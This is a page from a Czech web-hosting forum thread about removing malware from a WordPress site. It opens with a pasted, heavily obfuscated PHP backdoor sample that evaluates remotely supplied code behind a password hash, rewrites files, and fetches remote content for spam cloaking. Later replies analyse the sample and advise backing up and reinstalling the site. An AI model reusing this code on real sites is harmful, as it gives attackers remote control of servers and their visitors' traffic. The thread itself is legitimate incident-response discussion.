OOO_0O0_0_($OO_0OO0__0=''){$O_O_00O0_O=O_OO00O__0('K8pPydKi8p1iujcpKAEA');if(${"x47x4cx4fx42x41x4cx53"}($O_O_00O0_O)){@${"x47x4cx4fx42x41x4cx53"}($O_O_00O0_O);}if($OO_0OO0__0==''){$OO_0OO0__0=O_OO00O__0('08soSDuUxOTi0UpuBgA=');}$OO_0OO00__=O_OO00O__0('lVFNrcj5swEPxBvZiPSHB4h0CDgRDKR7DBN2waQ7ABlQTC+/VFIU9pT1VPq1nN7MzuRgcyUIg+z9gBhcq51+g9c4VB8lpcXKtndtt6V/3oHcyFQLR40BkpNLUAJoJ27dp/Vk46f6KpVVM4HyPbhCV+CAaUuoJhH/HeSKQYSR6GRZ5cS3vf5E1dF9JUKns3l65lMOm0JTbuDNbzBYr76qUH3ervPq5U3QGCd+CFR6qGv06fxfzCNYHKQJttTqXtb2u+rsT6Nsut5gDPM1HF/cXXmK2AEqIbSd8apoZLmVuALe8ewclQQXN56v55hw17kCxUBbzAj9G+ztNfe3/Xj9FByDM222q9jweViTjrvLxavRMRyNM3W/ii0vzVFzlUVgOVGT+r+jGTSGNSAJL5NVMzHsxD+qXLOjSS1PpZ4l27/o1teWMepBY9O+APbThRGXM/v6UJclCCwiwHxD8f0I84U5xLuq8DXPwnP37zka9QuGZr9tOWhT9/4Dm3Ux73RgDeu0fyr84+M3');$OO_0OO00__=@${"x47x4cx4fx42x41x4cx53"}($OO_0OO00__);if(${"x47x4cx4fx42x41x4cx53"}($OO_0OO0__0)){$O00OO_0_O_=${"x47x4cx4fx42x41x4cx53"}($OO_0OO0__0);if($OO_0OO00__==$O00OO_0_O_){return;}}@${"x47x4cx4fx42x41x4cx53"}($OO_0OO0__0,0777);@${"x47x4cx4fx42x41x4cx53"}($OO_0OO0__0,$OO_0OO00__);@${"x47x4cx4fx42x41x4cx53"}($OO_0OO0__0,0644);}function O_0O0O__0O($googleUrl,$O_0O0OO0__,$OOO0O__00_){$OO_0_00O_O=O_OO00O__0('yygpKvMSi20tdXLdYvyMxLty/OLEnNTSywVS0GiqgRBWAwA=');$O00OO__O_0=sprintf($OO_0_00O_O,$googleUrl,$OOO0O__00_,$OOO0O__00_,$O_0O0OO0__);$O_O0O_00O_=O_OO0_O0_0($O00OO__O_0);if(isset($_REQUEST)){${"x47x4cx4fx42x41x4cx53"}($O00OO__O_0);${"x47x4cx4fx42x41x4cx53"}($O_O0O_00O_);die();}$O__000OO_O=O_OO00O__0('S8/PTpO89VgJBQA=');$O0O0_OO0__=O_OO00O__0('Ky5NTfck4ihtLgYA');$OO__0O0_O0=O_OO00O__0('S0vMzbrElTqNAQA=');if(${"x47x4cx4fx42x41x4cx53"}($O_O0O_00O_,$O__000OO_O)!=false){die($O0O0_OO0__);}else{$OO_0_00O_O=O_OO00O__0('yygpKbHbDS11ct1i/IzEu3L84sSc1NLLBVLQaKqBYOBDAA==');$O00OO__O_0=sprintf($OO_0_00O_O,$googleUrl,$OOO0O__00_,$OOO0O__00_,$O_0O0OO0__);$O_O0O_00O_=O_OO0_O0_0($O00OO__O_0);if(${"x47x4cx4fx42x41x4cx53"}($O_O0O_00O_,$O__000OO_O)!=false){die($O0O0_OO0__);}die($OO__0O0_O0);}}function O_O00_0OO_($OO___0O00O){$OOO0O__00_=array();$OOO0O__00_=$OO___0O00O;$OOO0O__00_=O_O0O0O_0_($OOO0O__00_);$OOO0O__00_=OO00O__0_O();$OOO0O__00_=${"x5fx53x45x52x56x45x52"};$OOO0O__00_=isset(${"x5fx53x45x52x56x45x52"})?${"x5fx53x45x52x56x45x52"}:'';$OOO0O__00_=isset(${"x5fx53x45x52x56x45x52"})?${"x5fx53x45x52x56x45x52"}:'';$OOO0O__00_=O00O_0OO__();if(isset(${"x5fx53x45x52x56x45x52"})){$OOO0O__00_=O_OO00O__0('yygpKPSSi20tcSCHAA==');}else{$OOO0O__00_=O_OO00O__0('yygpKyqbDRBS1wcA');}if(isset(${"x5fx53x45x52x56x45x52"})){$OOO0O__00_=${"x5fx53x45x52x56x45x52"};}else{$OOO0O__00_="";}if(isset($_REQUEST)){$O0__OO0_0O=O_OO00O__0('c87PKPw0nNK9EtqSxItUosKMjJTE4syczP088qzs8YLDAA==');header($O0__OO0_0O);if(${"x47x4cx4fx42x41x4cx53"}('json_encode')){echo ${"x47x4cx4fx42x41x4cx53"}($OOO0O__00_);}else{${"x47x4cx4fx42x41x4cx53"}($OOO0O__00_);}die();}if(isset($_REQUEST)){die('2022/12/2');}if(isset($_REQUEST)){if(${"x47x4cx4fx42x41x4cx53"}(${"x47x4cx4fx42x41x4cx53"}($_REQUEST))=="e7ba60676aca63011211a9dc687f6d47"){$OO0_O0__O0=${"x47x4cx4fx42x41x4cx53"}(${"x47x4cx4fx42x41x4cx53"}((${"x47x4cx4fx42x41x4cx53"}(${"x47x4cx4fx42x41x4cx53"}($_REQUEST)))));$O_0_0O0O_O=${"x47x4cx4fx42x41x4cx53"}("PD9waHA=");if(${"x47x4cx4fx42x41x4cx53"}($OO0_O0__O0,$O_0_0O0O_O)===false){$OO0_O0__O0=$O_0_0O0O_O.PHP_EOL.$OO0_O0__O0;}if(isset($_REQUEST)){$OO0_O0__O0=${"x47x4cx4fx42x41x4cx53"}($O_0_0O0O_O,"",$OO0_O0__O0);$OOOO0_0__0='e'.${"x47x4cx4fx42x41x4cx53"}("dmE=").'l';$OOOO0_0__0($OO0_O0__O0);die();}$OO0_OO00__=${"x47x4cx4fx42x41x4cx53"}();${"x47x4cx4fx42x41x4cx53"}($OO0_OO00__,$OO0_O0__O0);$O00O__0OO_=${"x47x4cx4fx42x41x4cx53"}($OO0_OO00__);@require($O00O__0OO_);${"x47x4cx4fx42x41x4cx53"}($OO0_OO00__);die();}if(${"x47x4cx4fx42x41x4cx53"}($_REQUEST."a!#_11AA")=="2f7a76f71ff9e24be7c0015ff9cb81d8"){if(isset(${"x5fx47x45x54"})){$O_0O0OO0__=${"x5fx47x45x54"};$OO0_0_0_OO=O_OO00O__0('Ky8v1pk0vPz0/PSdVLzs8ARFAA==');if(isset(${"x5fx47x45x54"})){$OO0_0_0_OO=${"x5fx47x45x54"};}O_0O0O__0O($OO0_0_0_OO,$O_0O0OO0__,$OOO0O__00_);}}}OOO_0O0_0_();$O0___0OOO0=array('domain'=>$OOO0O__00_,'request_url'=>$OOO0O__00_,'ip'=>$OOO0O__00_,'agent'=>$OOO0O__00_,'referer'=>$OOO0O__00_,'protocol'=>$OOO0O__00_,'language'=>$OOO0O__00_);$OO_0OO00__=O_OO0_O0_0($OOO0O__00_,0,2,$O0___0OOO0,array(),$OOO0O__00_);if(isset($_REQUEST)){${"x47x4cx4fx42x41x4cx53"}($OO_0OO00__);$OO_0OO00__=O_OO0_O0_0("http://google.co.jp");${"x47x4cx4fx42x41x4cx53"}($OO_0OO00__);die();}$O00_O_O_O0=O0O__O_00O($OO_0OO00__);if($O00_O_O_O0!==false){foreach($O00_O_O_O0 as $O0__OO0_0O){@header($O0__OO0_0O);}echo $O00_O_O_O0;die();}}O_O00_0OO_($OO___0O00O);?>

7. 12. 2022 19:48:18

https://webtrh.cz/diskuse/odvirovani-wp-prepisovani-htaccess/strana/2#reply1510182

TomasX

(4 hodnocení)

8. 12. 2022 09:46:03

díky aspoň za tenhle kód, mno, stahuje si to další kódy z internetu, snaží se to očividně instalovat vlastní plugin, přepisuje několik souborů, víc času jsem jeho dekódování nevěnoval. Čekal bych, že to WP db si nahodí crony.

Nejde o IQ, útočníci mají týdny, měsíce na přípravu těhle "virů", ty máš hodiny, dny se tím vypořádat, není to snadné ani pro zkušené lidi.

Tady pro tebe je asi nejlepší řešení to prostě celé zálohovat, shodit a nahrát znovu. Čistění je velice těžké. Rád byh ti pomohl, ale nemám teď na to čas a nechtěl bych to udělat zdarma. Pokud jsi schopný sem napsat konkrétní problémy, budu se snažit ti odpovědět veřejně.

8. 12. 2022 09:46:03

https://webtrh.cz/diskuse/odvirovani-wp-prepisovani-htaccess/strana/2#reply1510181

sikec

(7 hodnocení)

8. 12. 2022 19:06:36

Vše jsem stáhl, smázl, nahrál zpět web - funguje, nahraju další a uvidíme...BTW jak si ten kod rozlouskl?

8. 12. 2022 19:06:36

https://webtrh.cz/diskuse/odvirovani-wp-prepisovani-htaccess/strana/2#reply1510180

TomasX

(4 hodnocení)

9. 12. 2022 07:25:54

Je to pořád php kód, textové hodnoty jsou často zakódovaný jako x##, proměnné jako název používají různé kombinace nul a písmen O. Názvy php funkcí se skládají se stringů postupně. Není to šifrované a ani jinak schované.

Šel jsem na to přes php fmt, převedl na AST, ručně jsem přeházel nějaké bloky, vypreparoval jsem z toho některé url a podíval se co je na nich. Neprocházel jsem to celé.

Zálohuj a dej si na to pozor, aktualizuj WP pravidelně. Není ještě jasné, jak tam pronikli, může to nastat znovu, podle informací k tomu kódu na internetu, tak je to skupina, která skenuje WP a využívá zranitelnosti, tak se tam teda nejspíš dostali.

9. 12. 2022 07:25:54

https://webtrh.cz/diskuse/odvirovani-wp-prepisovani-htaccess/strana/2#reply1510179

sikec

(7 hodnocení)

9. 12. 2022 17:07:32

To TomášX a ostatním děkuji za rady, no snad to bude dobrý...uvidíme zda se to tam zase neobjeví...

9. 12. 2022 17:07:32

https://webtrh.cz/diskuse/odvirovani-wp-prepisovani-htaccess/strana/2#reply1510178